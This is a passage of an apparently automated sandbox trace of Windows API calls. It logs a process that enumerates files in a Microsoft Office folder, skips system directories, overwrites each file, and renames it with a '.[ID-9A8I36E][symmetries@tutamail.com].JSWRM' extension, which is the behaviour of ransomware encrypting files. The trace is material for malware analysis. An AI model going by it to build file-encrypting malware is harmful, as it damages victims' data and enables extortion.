ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x46a78, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACWIZRC.DLL", cAlternateFileName="")) returned 1 [0113.569] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2=".") returned 1 [0113.569] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="..") returned 1 [0113.569] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="...") returned 1 [0113.569] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="windows") returned -1 [0113.569] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="recovery") returned -1 [0113.570] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="perflogs") returned -1 [0113.570] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="documents and settings") returned -1 [0113.570] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.570] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="system volume information") returned -1 [0113.570] lstrcmpiW (lpString1="ACWIZRC.DLL", lpString2="msocache") returned -1 [0113.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWIZRC.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWIZRC.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWIZRC.DLL", lpUsedDefaultChar=0x0) returned 11 [0113.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0113.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWIZRC.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWIZRC.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWIZRC.DLL", lpUsedDefaultChar=0x0) returned 11 [0113.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0113.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0113.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0113.570] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x358f248, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x358f248, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x358f248, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x13260, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="AEC.VSL", cAlternateFileName="")) returned 1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2=".") returned 1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="..") returned 1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="...") returned 1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="windows") returned -1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="recovery") returned -1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="perflogs") returned -1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="documents and settings") returned -1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="$RECYCLE.BIN") returned 1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="system volume information") returned -1 [0113.570] lstrcmpiW (lpString1="AEC.VSL", lpString2="msocache") returned -1 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AEC.VSL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AEC.VSL", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AEC.VSL", lpUsedDefaultChar=0x0) returned 7 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AEC.VSL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AEC.VSL", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AEC.VSL", lpUsedDefaultChar=0x0) returned 7 [0113.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0113.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0113.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\aec.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.574] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=78432) returned 1 [0113.574] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13260) returned 0x24c1d0 [0113.574] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x13260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x13260, lpOverlapped=0x0) returned 1 [0113.581] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.581] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x13260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x13260, lpOverlapped=0x0) returned 1 [0113.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.582] CloseHandle (hObject=0x238) returned 1 [0113.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0113.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0113.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0113.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0113.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0113.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\aec.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\AEC.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\aec.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0113.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0113.584] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x358f248, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x358f248, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x358f248, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xc0d0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="AECUTILS.VSL", cAlternateFileName="")) returned 1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2=".") returned 1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="..") returned 1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="...") returned 1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="windows") returned -1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="recovery") returned -1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="perflogs") returned -1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="documents and settings") returned -1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="$RECYCLE.BIN") returned 1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="system volume information") returned -1 [0113.584] lstrcmpiW (lpString1="AECUTILS.VSL", lpString2="msocache") returned -1 [0113.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0113.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AECUTILS.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AECUTILS.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AECUTILS.VSL", lpUsedDefaultChar=0x0) returned 12 [0113.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0113.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AECUTILS.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AECUTILS.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AECUTILS.VSL", lpUsedDefaultChar=0x0) returned 12 [0113.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0113.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0113.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0113.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\aecutils.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.585] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=49360) returned 1 [0113.585] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0d0) returned 0x24c1d0 [0113.586] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xc0d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xc0d0, lpOverlapped=0x0) returned 1 [0113.593] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.593] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xc0d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xc0d0, lpOverlapped=0x0) returned 1 [0113.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.594] CloseHandle (hObject=0x238) returned 1 [0113.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0113.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0113.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0113.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0113.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0113.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\aecutils.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\AECUTILS.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\aecutils.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0113.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0113.595] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4580dcb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4580dcb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4580dcb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x69e, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ASSET.VRD", cAlternateFileName="")) returned 1 [0113.595] lstrcmpiW (lpString1="ASSET.VRD", lpString2=".") returned 1 [0113.595] lstrcmpiW (lpString1="ASSET.VRD", lpString2="..") returned 1 [0113.595] lstrcmpiW (lpString1="ASSET.VRD", lpString2="...") returned 1 [0113.595] lstrcmpiW (lpString1="ASSET.VRD", lpString2="windows") returned -1 [0113.596] lstrcmpiW (lpString1="ASSET.VRD", lpString2="recovery") returned -1 [0113.596] lstrcmpiW (lpString1="ASSET.VRD", lpString2="perflogs") returned -1 [0113.596] lstrcmpiW (lpString1="ASSET.VRD", lpString2="documents and settings") returned -1 [0113.596] lstrcmpiW (lpString1="ASSET.VRD", lpString2="$RECYCLE.BIN") returned 1 [0113.596] lstrcmpiW (lpString1="ASSET.VRD", lpString2="system volume information") returned -1 [0113.596] lstrcmpiW (lpString1="ASSET.VRD", lpString2="msocache") returned -1 [0113.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0113.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSET.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSET.VRD", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ASSET.VRD", lpUsedDefaultChar=0x0) returned 9 [0113.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0113.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0113.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSET.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSET.VRD", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ASSET.VRD", lpUsedDefaultChar=0x0) returned 9 [0113.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0113.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0113.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0113.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0113.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\asset.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.599] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1694) returned 1 [0113.599] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x690) returned 0x22d530 [0113.599] ReadFile (in: hFile=0x238, lpBuffer=0x22d530, nNumberOfBytesToRead=0x690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x690, lpOverlapped=0x0) returned 1 [0113.600] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.600] WriteFile (in: hFile=0x238, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x690, lpOverlapped=0x0) returned 1 [0113.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0113.600] CloseHandle (hObject=0x238) returned 1 [0113.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0113.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0113.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0113.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0113.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0113.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.601] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\asset.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ASSET.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\asset.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 